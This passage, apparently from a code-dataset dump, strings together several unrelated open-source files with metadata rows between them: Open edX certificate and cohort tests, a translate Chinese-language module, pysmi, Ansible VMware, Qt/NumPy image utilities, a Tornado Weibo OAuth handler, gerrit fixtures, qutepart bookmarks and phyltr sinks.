assert 'certificates' in res_json
assert len(res_json['certificates']) == 1
def test_certificates_features_group_by_mode(self):
"""
Test for certificate csv features against mode. Certificates should be group by 'mode' in reponse.
"""
url = reverse('get_issued_certificates', kwargs={'course_id': str(self.course.id)})
# firstly generating downloadable certificates with 'honor' mode
certificate_count = 3
for __ in range(certificate_count):
self.generate_certificate(course_id=self.course.id, mode='honor', status=CertificateStatuses.downloadable)
response = self.client.post(url)
res_json = json.loads(response.content.decode('utf-8'))
assert 'certificates' in res_json
assert len(res_json['certificates']) == 1
# retrieve the first certificate from the list, there should be 3 certificates for 'honor' mode.
certificate = res_json['certificates'][0]
assert certificate.get('total_issued_certificate') == 3
assert certificate.get('mode') == 'honor'
assert certificate.get('course_id') == str(self.course.id)
# Now generating downloadable certificates with 'verified' mode
for __ in range(certificate_count):
self.generate_certificate(
course_id=self.course.id,
mode='verified',
status=CertificateStatuses.downloadable
)
response = self.client.post(url)
res_json = json.loads(response.content.decode('utf-8'))
assert 'certificates' in res_json
# total certificate count should be 2 for 'verified' mode.
assert len(res_json['certificates']) == 2
# retrieve the second certificate from the list
certificate = res_json['certificates'][1]
assert certificate.get('total_issued_certificate') == 3
assert certificate.get('mode') == 'verified'
def test_certificates_features_csv(self):
"""
Test for certificate csv features.
"""
url = reverse('get_issued_certificates', kwargs={'course_id': str(self.course.id)})
# firstly generating downloadable certificates with 'honor' mode
certificate_count = 3
for __ in range(certificate_count):
self.generate_certificate(course_id=self.course.id, mode='honor', status=CertificateStatuses.downloadable)
current_date = datetime.date.today().strftime("%B %d, %Y")
response = self.client.get(url, {'csv': 'true'})
assert response['Content-Type'] == 'text/csv'
assert response['Content-Disposition'] == u'attachment; filename={0}'.format('issued_certificates.csv')
assert response.content.strip().decode('utf-8') == \
(((('"CourseID","Certificate Type","Total Certificates Issued","Date Report Run"\r\n"' +
str(self.course.id)) + '","honor","3","') + current_date) + '"')
class TestBulkCohorting(SharedModuleStoreTestCase):
"""
Test adding users to cohorts in bulk via CSV upload.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
super().setUp()
self.staff_user = StaffFactory(course_key=self.course.id)
self.non_staff_user = UserFactory.create()
self.tempdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, self.tempdir)
def call_add_users_to_cohorts(self, csv_data, suffix='.csv'):
"""
Call `add_users_to_cohorts` with a file generated from `csv_data`.
"""
# this temporary file will be removed in `self.tearDown()`
__, file_name = tempfile.mkstemp(suffix=suffix, dir=self.tempdir)
with open(file_name, 'w') as file_pointer:
file_pointer.write(csv_data)
with open(file_name) as file_pointer:
url = reverse('add_users_to_cohorts', kwargs={'course_id': str(self.course.id)})
return self.client.post(url, {'uploaded-file': file_pointer})
def expect_error_on_file_content(self, file_content, error, file_suffix='.csv'):
"""
Verify that we get the error we expect for a given file input.
"""
self.client.login(username=self.staff_user.username, password='test')
response = self.call_add_users_to_cohorts(file_content, suffix=file_suffix)
assert response.status_code == 400
result = json.loads(response.content.decode('utf-8'))
assert result['error'] == error
def verify_success_on_file_content(self, file_content, mock_store_upload, mock_cohort_task):
"""
Verify that `addd_users_to_cohorts` successfully validates the
file content, uploads the input file, and triggers the
background task.
"""
mock_store_upload.return_value = (None, 'fake_file_name.csv')
self.client.login(username=self.staff_user.username, password='test')
response = self.call_add_users_to_cohorts(file_content)
assert response.status_code == 204
assert mock_store_upload.called
assert mock_cohort_task.called
def test_no_cohort_field(self):
"""
Verify that we get a descriptive verification error when we haven't
included a cohort field in the uploaded CSV.
"""
self.expect_error_on_file_content(
'username,email\n', "The file must contain a 'cohort' column containing cohort names."
)
def test_no_username_or_email_field(self):
"""
Verify that we get a descriptive verification error when we haven't
included a username or email field in the uploaded CSV.
"""
self.expect_error_on_file_content(
'cohort\n', "The file must contain a 'username' column, an 'email' column, or both."
)
def test_empty_csv(self):
"""
Verify that we get a descriptive verification error when we haven't
included any data in the uploaded CSV.
"""
self.expect_error_on_file_content(
'', "The file must contain a 'cohort' column containing cohort names."
)
def test_wrong_extension(self):
"""
Verify that we get a descriptive verification error when we haven't
uploaded a file with a '.csv' extension.
"""
self.expect_error_on_file_content(
'', "The file must end with the extension '.csv'.", file_suffix='.notcsv'
)
def test_non_staff_no_access(self):
"""
Verify that we can't access the view when we aren't a staff user.
"""
self.client.login(username=self.non_staff_user.username, password='test')
response = self.call_add_users_to_cohorts('')
assert response.status_code == 403
@patch('lms.djangoapps.instructor_task.api.submit_cohort_students')
@patch('lms.djangoapps.instructor.views.api.store_uploaded_file')
def test_success_username(self, mock_store_upload, mock_cohort_task):
"""
Verify that we store the input CSV and call a background task when
the CSV has username and cohort columns.
"""
self.verify_success_on_file_content(
'username,cohort\nfoo_username,bar_cohort', mock_store_upload, mock_cohort_task
)
@patch('lms.djangoapps.instructor_task.api.submit_cohort_students')
@patch('lms.djangoapps.instructor.views.api.store_uploaded_file')
def test_success_email(self, mock_store_upload, mock_cohort_task):
"""
Verify that we store the input CSV and call the cohorting background
task when the CSV has email and cohort columns.
"""
self.verify_success_on_file_content(
'email,cohort\nfoo_email,bar_cohort', mock_store_upload, mock_cohort_task
)
@patch('lms.djangoapps.instructor_task.api.submit_cohort_students')
@patch('lms.djangoapps.instructor.views.api.store_uploaded_file')
def test_success_username_and_email(self, mock_store_upload, mock_cohort_task):
"""
Verify that we store the input CSV and call the cohorting background
task when the CSV has username, email and cohort columns.
"""
self.verify_success_on_file_content(
'username,email,cohort\nfoo_username,bar_email,baz_cohort', mock_store_upload, mock_cohort_task
)
@patch('lms.djangoapps.instructor_task.api.submit_cohort_students')
@patch('lms.djangoapps.instructor.views.api.store_uploaded_file')
def test_success_carriage_return(self, mock_store_upload, mock_cohort_task):
"""
Verify that we store the input CSV and call the cohorting background
task when lines in the CSV are delimited by carriage returns.
"""
self.verify_success_on_file_content(
'username,email,cohort\rfoo_username,bar_email,baz_cohort', mock_store_upload, mock_cohort_task
)
@patch('lms.djangoapps.instructor_task.api.submit_cohort_students')
@patch('lms.djangoapps.instructor.views.api.store_uploaded_file')
def test_success_carriage_return_line_feed(self, mock_store_upload, mock_cohort_task):
"""
Verify that we store the input CSV and call the cohorting background
task when lines in the CSV are delimited by carriage returns and line
feeds.
"""
self.verify_success_on_file_content(
'username,email,cohort\r\nfoo_username,bar_email,baz_cohort', mock_store_upload, mock_cohort_task
)
class TestInstructorCertificateExceptions(SharedModuleStoreTestCase):
"""
Tests for utility functions utilized in the Instructor Dashboard Certificates app.
"""
def setUp(self):
super().setUp()
self.global_staff = GlobalStaffFactory()
self.course = CourseFactory.create()
self.user = UserFactory()
CourseEnrollment.enroll(self.user, self.course.id)
def test_get_student_from_request_data(self):
"""
Test ability to retrieve a learner record using their username and course id
"""
student = _get_student_from_request_data({"user": self.user.username})
assert student.username == self.user.username
def test_get_student_from_request_data_empty_username(self):
"""
Test that we receive an expected error when no learner's username or email is entered
"""
with pytest.raises(ValueError) as error:
_get_student_from_request_data({"user": ""})
assert str(error.value) == (
'Student username/email field is required and can not be empty. Kindly fill in username/email and then '
'press "Invalidate Certificate" button.'
)
def test_get_student_from_request_data_user_dne(self):
"""
Test to verify an expected error message is returned when attempting to retrieve a learner that does not exist
in the LMS.
"""
with pytest.raises(ValueError) as error:
_get_student_from_request_data({"user": "Neo"})
assert str(error.value) == "Neo does not exist in the LMS. Please check your spelling and retry."
def test_get_certificate_for_user(self):
"""
Test that attempts to retrieve a Certificate for a learner in a course-run.
"""
generated_certificate = GeneratedCertificateFactory.create(
user=self.user,
course_id=self.course.id,
mode='verified',
status=CertificateStatuses.downloadable,
)
retrieved_certificate = _get_certificate_for_user(self.course.id, self.user)
assert retrieved_certificate.id == generated_certificate.id
def test_get_certificate_for_user_no_certificate(self):
"""
Test to verify an expected error message is returned when attempting to retrieve a certificate for a learner
that does not exist yet.
"""
with pytest.raises(ValueError) as error:
_get_certificate_for_user(self.course.id, self.user)
assert str(error.value) == (
f"The student {self.user} does not have certificate for the course {self.course.id.course}. Kindly "
"verify student username/email and the selected course are correct and try again."
)
| agpl-3.0 | -7,379,486,599,918,372,000 | 41.9 | 202 | 0.613406 | false | 4.06535 | true | false | false |
dwaynebailey/translate | translate/lang/zh.py | 3 | 2423 | # -*- coding: utf-8 -*-
#
# Copyright 2007 Zuza Software Foundation
#
# This file is part of translate.
#
# translate is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# translate is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
"""This module represents the Chinese language (Both tradisional and simplified).
.. seealso:: http://en.wikipedia.org/wiki/Chinese_language
"""
from __future__ import unicode_literals
import re
from translate.lang import common
class zh(common.Common):
"""This class represents Chinese."""
listseperator = "、"
sentenceend = "。!?!?…"
# Compared to common.py, we make the space after the sentence ending
# optional and don't demand an uppercase letter to follow.
sentencere = re.compile(r"""(?s) # make . also match newlines
.*? # any text, but match non-greedy
[%s] # the puntuation for sentence ending
\s* # the optional space after the puntuation
""" % sentenceend, re.VERBOSE)
# The following transformation rules should be mostly useful for all types
# of Chinese. The comma (,) is not handled here, since it maps to two
# different characters, depending on context.
# If comma is used as seperation of sentence, it should be converted to a
# fullwidth comma (","). If comma is used as seperation of list items
# like "apple, orange, grape, .....", "、" is used.
puncdict = {
". ": "。",
"; ": ";",
": ": ":",
"! ": "!",
"? ": "?",
".\n": "。\n",
";\n": ";\n",
":\n": ":\n",
"!\n": "!\n",
"?\n": "?",
"% ": "%",
}
@classmethod
def length_difference(cls, length):
return 10 - length / 2
ignoretests = {
'all': ["simplecaps", "startcaps"],
}
| gpl-2.0 | -8,731,170,228,729,389,000 | 31.726027 | 81 | 0.601088 | false | 3.871961 | false | false | false |
etingof/pysmi | pysmi/reader/callback.py | 1 | 1516 | #
# This file is part of pysmi software.
#
# Copyright (c) 2015-2020, Ilya Etingof <etingof@gmail.com>
# License: http://snmplabs.com/pysmi/license.html
#
import time
from pysmi.reader.base import AbstractReader
from pysmi.mibinfo import MibInfo
from pysmi import error
from pysmi import debug
class CallbackReader(AbstractReader):
"""Fetch ASN.1 MIB text by name by calling user-defined callable.
*CallbackReader* class instance tries to retrieve ASN.1 MIB files
by name and return their contents to caller.
"""
def __init__(self, cbFun, cbCtx=None):
"""Create an instance of *CallbackReader* bound to specific URL.
Args:
cbFun (callable): user callable accepting *MIB name* and *cbCtx* objects
Keyword Args:
cbCtx (object): user object that can be used to communicate state information
between user-scope code and the *cbFun* callable scope
"""
self._cbFun = cbFun
self._cbCtx = cbCtx
def __str__(self):
return '%s{"%s"}' % (self.__class__.__name__, self._cbFun)
def getData(self, mibname, **options):
debug.logger & debug.flagReader and debug.logger('calling user callback %s for MIB %s' % (self._cbFun, mibname))
res = self._cbFun(mibname, self._cbCtx)
if res:
return MibInfo(path='file:///dev/stdin', file='', name=mibname, mtime=time.time()), res
raise error.PySmiReaderFileNotFoundError(mibname=mibname, reader=self)
| bsd-2-clause | 4,648,905,572,071,834,000 | 34.255814 | 120 | 0.652375 | false | 3.661836 | false | false | false |
sorenk/ansible | lib/ansible/modules/cloud/vmware/vmware_cluster_facts.py | 7 | 8021 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Ansible Project
# Copyright: (c) 2018, Abhijeet Kasurde <akasurde@redhat.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: vmware_cluster_facts
short_description: Gather facts about clusters available in given vCenter
description:
- This module can be used to gather facts about clusters in VMWare infrastructure.
- All values and VMware object names are case sensitive.
version_added: '2.6'
author:
- Abhijeet Kasurde (@akasurde)
notes:
- Tested on vSphere 6.5
requirements:
- "python >= 2.6"
- PyVmomi
options:
datacenter:
description:
- Datacenter to search for cluster/s.
- This parameter is required, if C(cluster_name) is not supplied.
required: False
cluster_name:
description:
- Name of the cluster.
- If set, facts of this cluster will be returned.
- This parameter is required, if C(datacenter) is not supplied.
required: False
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = '''
- name: Gather cluster facts from given datacenter
vmware_cluster_facts:
hostname: 192.168.1.209
username: administrator@vsphere.local
password: vmware
datacenter: ha-datacenter
validate_certs: False
delegate_to: localhost
register: cluster_facts
- name: Gather facts from datacenter about specific cluster
vmware_cluster_facts:
hostname: 192.168.1.209
username: administrator@vsphere.local
password: vmware
cluster_name: DC0_C0
validate_certs: False
delegate_to: localhost
register: cluster_facts
'''
RETURN = """
clusters:
description: metadata about the available clusters
returned: always
type: dict
sample: {
"DC0_C0": {
"drs_default_vm_behavior": null,
"drs_enable_vm_behavior_overrides": null,
"drs_vmotion_rate": null,
"enable_ha": null,
"enabled_drs": true,
"enabled_vsan": false,
"ha_admission_control_enabled": null,
"ha_failover_level": null,
"ha_host_monitoring": null,
"ha_restart_priority": null,
"ha_vm_failure_interval": null,
"ha_vm_max_failure_window": null,
"ha_vm_max_failures": null,
"ha_vm_min_up_time": null,
"ha_vm_monitoring": null,
"ha_vm_tools_monitoring": null,
"vsan_auto_claim_storage": false
},
}
"""
try:
from pyVmomi import vim
except ImportError:
pass
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import PyVmomi, vmware_argument_spec, find_datacenter_by_name, find_cluster_by_name
class VmwreClusterFactsManager(PyVmomi):
def __init__(self, module):
super(VmwreClusterFactsManager, self).__init__(module)
datacenter = self.params.get('datacenter')
cluster_name = self.params.get('cluster_name')
self.cluster_objs = []
if datacenter:
datacenter_obj = find_datacenter_by_name(self.content, datacenter_name=datacenter)
if datacenter_obj is None:
self.module.fail_json(msg="Failed to find datacenter '%s'" % datacenter)
self.cluster_objs = self.get_all_cluster_objs(parent=datacenter_obj)
elif cluster_name:
cluster_obj = find_cluster_by_name(self.content, cluster_name=cluster_name)
if cluster_obj is None:
self.module.fail_json(msg="Failed to find cluster '%s'" % cluster_name)
self.cluster_objs = [cluster_obj]
def get_all_cluster_objs(self, parent):
"""
Function to get all cluster managed objects from given parent object
Args:
parent: Managed objected of datacenter or host folder
Returns: List of host managed objects
"""
cluster_objs = []
if isinstance(parent, vim.Datacenter):
folder = parent.hostFolder
else:
folder = parent
for child in folder.childEntity:
if isinstance(child, vim.Folder):
cluster_objs = cluster_objs + self.get_all_cluster_objs(child)
if isinstance(child, vim.ClusterComputeResource):
cluster_objs.append(child)
return cluster_objs
def gather_cluster_facts(self):
"""
Function to gather facts about cluster
"""
results = dict(changed=False, clusters=dict())
for cluster in self.cluster_objs:
# Default values
ha_failover_level = None
ha_restart_priority = None
ha_vm_tools_monitoring = None
ha_vm_min_up_time = None
ha_vm_max_failures = None
ha_vm_max_failure_window = None
ha_vm_failure_interval = None
enabled_vsan = False
vsan_auto_claim_storage = False
# HA
das_config = cluster.configurationEx.dasConfig
if das_config.admissionControlPolicy:
ha_failover_level = das_config.admissionControlPolicy.failoverLevel
if das_config.defaultVmSettings:
ha_restart_priority = das_config.defaultVmSettings.restartPriority,
ha_vm_tools_monitoring = das_config.defaultVmSettings.vmToolsMonitoringSettings.vmMonitoring,
ha_vm_min_up_time = das_config.defaultVmSettings.vmToolsMonitoringSettings.minUpTime,
ha_vm_max_failures = das_config.defaultVmSettings.vmToolsMonitoringSettings.maxFailures,
ha_vm_max_failure_window = das_config.defaultVmSettings.vmToolsMonitoringSettings.maxFailureWindow,
ha_vm_failure_interval = das_config.defaultVmSettings.vmToolsMonitoringSettings.failureInterval,
# DRS
drs_config = cluster.configurationEx.drsConfig
# VSAN
if hasattr(cluster.configurationEx, 'vsanConfig'):
vsan_config = cluster.configurationEx.vsanConfig
enabled_vsan = vsan_config.enabled,
vsan_auto_claim_storage = vsan_config.defaultConfig.autoClaimStorage,
results['clusters'][cluster.name] = dict(
enable_ha=das_config.enabled,
ha_failover_level=ha_failover_level,
ha_vm_monitoring=das_config.vmMonitoring,
ha_host_monitoring=das_config.hostMonitoring,
ha_admission_control_enabled=das_config.admissionControlEnabled,
ha_restart_priority=ha_restart_priority,
ha_vm_tools_monitoring=ha_vm_tools_monitoring,
ha_vm_min_up_time=ha_vm_min_up_time,
ha_vm_max_failures=ha_vm_max_failures,
ha_vm_max_failure_window=ha_vm_max_failure_window,
ha_vm_failure_interval=ha_vm_failure_interval,
enabled_drs=drs_config.enabled,
drs_enable_vm_behavior_overrides=drs_config.enableVmBehaviorOverrides,
drs_default_vm_behavior=drs_config.defaultVmBehavior,
drs_vmotion_rate=drs_config.vmotionRate,
enabled_vsan=enabled_vsan,
vsan_auto_claim_storage=vsan_auto_claim_storage,
)
self.module.exit_json(**results)
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(
datacenter=dict(type='str'),
cluster_name=dict(type='str')
)
module = AnsibleModule(
argument_spec=argument_spec,
required_one_of=[
['cluster_name', 'datacenter'],
],
)
pyv = VmwreClusterFactsManager(module)
pyv.gather_cluster_facts()
if __name__ == '__main__':
main()
| gpl-3.0 | 5,528,659,484,127,036,000 | 34.648889 | 116 | 0.626855 | false | 3.903163 | true | false | false |
fredo-editor/FreDo | fredo/util/numpy_util.py | 1 | 2992 | from PySide.QtGui import QImage
import numpy as np
def qimage_to_numpy(qimage):
""" Returns an RGB array given any image. """
# Each row in a bitmap is stored in the size of multiples of 4
# If there are less number of bits in a row, it is padded with 0s
# a 32 bit format ensures that we can get away with dealing with padding
qimage = qimage.convertToFormat(QImage.Format_ARGB32)
w, h = qimage.width(), qimage.height()
string = qimage.bits()
arr = np.fromstring(bytes(string), dtype=np.uint8)
arr = arr.reshape(h, w, 4)
arr = arr[..., 0:3]
c0 = arr[..., 0].copy()
c2 = arr[..., 2].copy()
arr[..., 0] = c2
arr[..., 2] = c0
return arr
def numpy_to_qimage(array):
""" Returns QImage from an RGB array ."""
rows, cols, channels = array.shape
array4 = np.zeros((rows, cols, 4), dtype=np.uint8)
array4[..., 0:3] = array
array4[..., 3] = 255
c0 = array[..., 0].copy()
c2 = array[..., 2].copy()
array4[..., 0] = c2
array4[..., 2] = c0
string = array4.tostring()
img = QImage(string, cols, rows, QImage.Format_ARGB32)
# On windows, img `img` holds a reference to `string` and behaves wrongly
# when the string goes out of scope.
return img.copy()
def rgb_to_gray(arr):
""" Converts an RGB numpy array to grayscale. """
r = arr[:, :, 0].astype(np.float)
g = arr[:, :, 1].astype(np.float)
b = arr[:, :, 2].astype(np.float)
garr = 0.299*r + 0.587*g + 0.114*b
return garr.astype(np.uint8)
def gray_to_rgb(arr):
""" Converts intensity array to RGB. """
return np.dstack([arr, arr, arr])
def rgb_to_yuv(arr):
"Converts RGB array to YUV."
r = arr[:, :, 0].astype(np.float)
g = arr[:, :, 1].astype(np.float)
b = arr[:, :, 2].astype(np.float)
y = r*.299000 + g*.587000 + b*.114000
u = r*-.168736 + g*-.331264 + b*.500000 + 128
v = r*.500000 + g*-.418688 + b*-.081312 + 128
ret = np.dstack([y, u, v])
ret = np.clip(ret, 0, 255)
return ret.astype(np.uint8)
def yuv_to_rgb(arr):
"Converts YUV array to RGB"
y = arr[:, :, 0].astype(np.float)
u = arr[:, :, 1].astype(np.float)
v = arr[:, :, 2].astype(np.float)
r = y + 1.4075 * (v - 128)
g = y - 0.3455 * (u - 128) - (0.7169 * (v - 128))
b = y + 1.7790 * (u - 128)
ret = np.dstack([r, g, b])
ret = np.clip(ret, 0, 255)
return ret.astype(np.uint8)
def fft_to_qimage(arr):
"""Converts frquency spectrum magnitude image to displayable qimage.
To make the image visually conceivable, we take the log of the array.
Otherwise, there is just too much difference between the maxima and minima.
"""
magnitutde_log = np.log(1 + arr) # To avoid computing log(0).
mn = magnitutde_log.min()
mx = magnitutde_log.max()
norm_img = 255*(magnitutde_log - mn)/(mx - mn)
norm_img = norm_img.astype(np.uint8)
rgb_image = gray_to_rgb(norm_img)
return numpy_to_qimage(rgb_image)
| bsd-3-clause | -2,712,060,152,697,588,000 | 25.954955 | 79 | 0.583556 | false | 2.941986 | false | false | false |
fro391/Investing | ArticleScrape/Econ_Word_Scrape.py | 1 | 1039 | from newspaper import Article
import re
def textDownload (H_Link):
#gets article portion of the htmltext
try:
a = Article(H_Link)
a.download()
a.parse()
UnicodeArticle = a.text
StringArticle = UnicodeArticle.encode('ascii','ignore')
StrippedArticle = StringArticle.replace('\n','')
return StrippedArticle
except Exception as ex:
template = "An exception of type {0} occured. Arguments:\n{1!r}"
message = template.format(type(ex).__name__, ex.args)
print message
def countKeyWords (text,keyword):
#returns count of given keyword
regex = keyword
pattern = re.compile(regex,re.IGNORECASE)
l = re.findall(pattern,text)
return 'There are '+str(len(l))+ ' occurances of \"'+ keyword +'\" in the article.'
if __name__ == '__main__':
keyword = 'percent' #not case sensitive
html_link = 'https://www.federalreserve.gov/newsevents/pressreleases/monetary20170201a.htm'
print countKeyWords(textDownload(html_link),keyword) | gpl-2.0 | 3,965,828,110,465,999,400 | 32.548387 | 95 | 0.655438 | false | 3.73741 | false | false | false |
kernel1983/tornado_WeiboMixin | auth.py | 1 | 2378 | import time
import random
import string
import urlparse
import urllib
import hashlib
import tornado.web
import tornado.template
import tornado.auth
import tornado.escape
from setting import settings
import functools
from tornado import httpclient
from tornado import escape
class WeiboMixin(tornado.auth.OAuth2Mixin):
_OAUTH_ACCESS_TOKEN_URL = "https://api.weibo.com/oauth2/access_token"
_OAUTH_AUTHORIZE_URL = "https://api.weibo.com/oauth2/authorize"
@tornado.web.asynchronous
def get_authenticated_user(self, redirect_uri, client_id, client_secret,
code, callback, extra_fields=None):
http = httpclient.AsyncHTTPClient()
fields = set()
if extra_fields:
fields.update(extra_fields)
args = {
"redirect_uri": redirect_uri,
"code": code,
"client_id": client_id,
"client_secret": client_secret,
"grant_type": "authorization_code"
}
http.fetch(self._OAUTH_ACCESS_TOKEN_URL,
self.async_callback(self._on_access_token, redirect_uri, client_id, client_secret, callback, fields),
method="POST", body=urllib.urlencode(args))
@tornado.web.asynchronous
def _on_access_token(self, redirect_uri, client_id, client_secret,
callback, fields, response):
session = escape.json_decode(response.body)
callback(session)
class WeiboHandler(tornado.web.RequestHandler,
WeiboMixin):
@tornado.web.asynchronous
def get(self):
redirect_uri = "%s://%s%s" % (self.request.protocol, self.request.host, self.request.path)
code = self.get_argument("code", None)
if code:
self.get_authenticated_user(redirect_uri, settings["WeiboAppKey"], settings["WeiboAppSecret"],
code, self._on_auth)
return
self.authorize_redirect(redirect_uri,
client_id=settings["WeiboAppKey"],
extra_params={"response_type": "code"})
def _on_auth(self, session):
self.finish(session)
class LogoutHandler(tornado.web.RequestHandler):
def get(self):
self.redirect_url = self.get_argument("next", "/")
self.clear_cookie("user")
self.redirect(self.redirect_url)
| mit | 1,040,992,154,674,021,400 | 30.706667 | 113 | 0.619428 | false | 3.976589 | false | false | false |
scidam/leafs | leaf/leaf/main/mcreate.py | 1 | 2215 | from .models import LeafData
import csv
from datetime import datetime
import re
import os
from geoposition import Geoposition
from decimal import Decimal
from django.core.files import File
import matplotlib.pyplot as plt
def _get_data_from_filename(filename):
datepat = re.compile(r'.+\_(?P<day>\d\d)\_(?P<month>\d\d)\_(?P<year>\d\d\d\d).+')
match = datepat.match(filename)
return (match.group('day'), match.group('month'), match.group('year')) if match else None
def to_decimal(s):
try:
res = Decimal(s)
except:
res = Decimal()
return res
with open('eggs.csv', 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',', quotechar='"')
for row in spamreader:
ld = LeafData.objects.create()
cdate = _get_data_from_filename(row[0])
if cdate:
try:
ld.collected = datetime(int(cdate[2]), int(cdate[1]), int(cdate[0]))
except:
pass
ld.filename = row[0]
ld.species = row[1]
ld.where = Geoposition(to_decimal(row[2]), to_decimal(row[3]))
srcs = row[4].split(',')
if len(srcs) > 1:
with open(srcs[0], 'r') as f:
fd = File(f)
ld.source1.save(os.path.basename(srcs[0]),fd, save=True)
with open(srcs[1], 'r') as f:
fd = File(f)
ld.source2.save(os.path.basename(srcs[1]),fd, save=True)
elif len(srcs) == 1 and len(srcs[0]) > 0:
with open(srcs[0], 'r') as f:
fd = File(f)
ld.source1.save(os.path.basename(srcs[0]),fd, save=True)
ld.xdata = row[5]
ld.ydata = row[6]
with open('leafcont%s.png'%ld.pk,'w+') as inpf:
f = plt.figure()
ax = f.add_subplot('111')
x = map(lambda x: float(x), row[5].split(','))
y = map(lambda x: float(x), row[6].split(','))
ax.plot(x,y)
ax.set_aspect('equal')
ax.grid('on')
f.savefig(inpf, dpi=200)
plt.close(plt.gcf())
inpf.seek(0)
ld.leafcont.save('leafcont%s.png'%ld.pk, File(inpf), save=True)
ld.save()
| mit | 3,333,425,212,414,557,000 | 33.092308 | 93 | 0.530023 | false | 3.182471 | false | false | false |
tivaliy/python-gerritclient | gerritclient/tests/utils/fake_comment.py | 1 | 1586 | #
# Copyright 2017 Vitalii Kulanov
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
def get_fake_comment(patch_set=None, comment_id=None, line=None, message=None,
author=None):
"""Creates a fake comment."""
return {
"patch_set": patch_set or 1,
"id": comment_id or "TvcXrmjM",
"line": line or 23,
"message": message or "[nit] trailing whitespace",
"updated": "2013-02-26 15:40:43.986000000",
"author": author or {
"_account_id": 1000096,
"name": "John Doe",
"email": "john.doe@example.com"
}
}
def get_fake_comments(comment_count, **kwargs):
"""Creates a random fake list of comments."""
return [get_fake_comment(**kwargs) for _ in range(comment_count)]
def get_fake_comments_in_change(comment_count, path=None, **kwargs):
"""Creates a random fake list of comments in change."""
return {
path or "gerrit-server/fake/path/to/file":
get_fake_comments(comment_count, **kwargs)
}
| apache-2.0 | 7,630,968,110,726,776,000 | 32.744681 | 78 | 0.630517 | false | 3.740566 | false | false | false |
hlamer/qutepart | qutepart/bookmarks.py | 2 | 3298 | """Bookmarks functionality implementation"""
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QAction
from PyQt5.QtGui import QKeySequence, QTextCursor
import qutepart
class Bookmarks:
"""Bookmarks functionality implementation, grouped in one class
"""
def __init__(self, qpart, markArea):
self._qpart = qpart
self._markArea = markArea
qpart.toggleBookmarkAction = self._createAction(qpart, "emblem-favorite", "Toogle bookmark", 'Ctrl+B',
self._onToggleBookmark)
qpart.prevBookmarkAction = self._createAction(qpart, "go-up", "Previous bookmark", 'Alt+PgUp',
self._onPrevBookmark)
qpart.nextBookmarkAction = self._createAction(qpart, "go-down", "Next bookmark", 'Alt+PgDown',
self._onNextBookmark)
markArea.blockClicked.connect(self._toggleBookmark)
def _createAction(self, widget, iconFileName, text, shortcut, slot):
"""Create QAction with given parameters and add to the widget
"""
icon = qutepart.getIcon(iconFileName)
action = QAction(icon, text, widget)
action.setShortcut(QKeySequence(shortcut))
action.setShortcutContext(Qt.WidgetShortcut)
action.triggered.connect(slot)
widget.addAction(action)
return action
def removeActions(self):
self._qpart.removeAction(self._qpart.toggleBookmarkAction)
self._qpart.toggleBookmarkAction = None
self._qpart.removeAction(self._qpart.prevBookmarkAction)
self._qpart.prevBookmarkAction = None
self._qpart.removeAction(self._qpart.nextBookmarkAction)
self._qpart.nextBookmarkAction = None
def clear(self, startBlock, endBlock):
"""Clear bookmarks on block range including start and end
"""
for block in qutepart.iterateBlocksFrom(startBlock):
self._setBlockMarked(block, False)
if block == endBlock:
break
def isBlockMarked(self, block):
"""Check if block is bookmarked
"""
return self._markArea.isBlockMarked(block)
def _setBlockMarked(self, block, marked):
"""Set block bookmarked
"""
self._markArea.setBlockValue(block, 1 if marked else 0)
def _toggleBookmark(self, block):
self._markArea.toggleBlockMark(block)
self._markArea.update()
def _onToggleBookmark(self):
"""Toogle Bookmark action triggered
"""
self._toggleBookmark(self._qpart.textCursor().block())
def _onPrevBookmark(self):
"""Previous Bookmark action triggered. Move cursor
"""
for block in qutepart.iterateBlocksBackFrom(self._qpart.textCursor().block().previous()):
if self.isBlockMarked(block):
self._qpart.setTextCursor(QTextCursor(block))
return
def _onNextBookmark(self):
"""Previous Bookmark action triggered. Move cursor
"""
for block in qutepart.iterateBlocksFrom(self._qpart.textCursor().block().next()):
if self.isBlockMarked(block):
self._qpart.setTextCursor(QTextCursor(block))
return
| lgpl-2.1 | 3,291,824,203,735,315,000 | 36.908046 | 110 | 0.625531 | false | 4.206633 | false | false | false |
lmaurits/phyltr | src/phyltr/plumbing/sinks.py | 1 | 1699 | import sys
class NewickFormatter:
def __init__(self, out=sys.stdout, annotations=True, topology_only=False):
self.out = out
self.annotations = annotations
self.topology_only = topology_only
def consume(self, stream):
first = True
for t in stream:
if first:
first = False
feature_names = set()
for n in t.traverse():
feature_names |= n.features
for standard_feature in ("dist", "name", "support"):
feature_names.remove(standard_feature)
if self.topology_only:
self.out.write(t.write(format=9))
elif self.annotations:
self.out.write(t.write(features=feature_names, format_root_node=True))
else:
self.out.write(t.write())
self.out.write("\n")
class NullSink:
def __init__(self, out=sys.stdout):
self.out = out
def consume(self, stream):
for t in stream:
pass
class StringFormatter:
def __init__(self, out=sys.stdout):
self.out = out
def consume(self, stream):
for x in stream:
if isinstance(x, str):
self.out.write(x)
else:
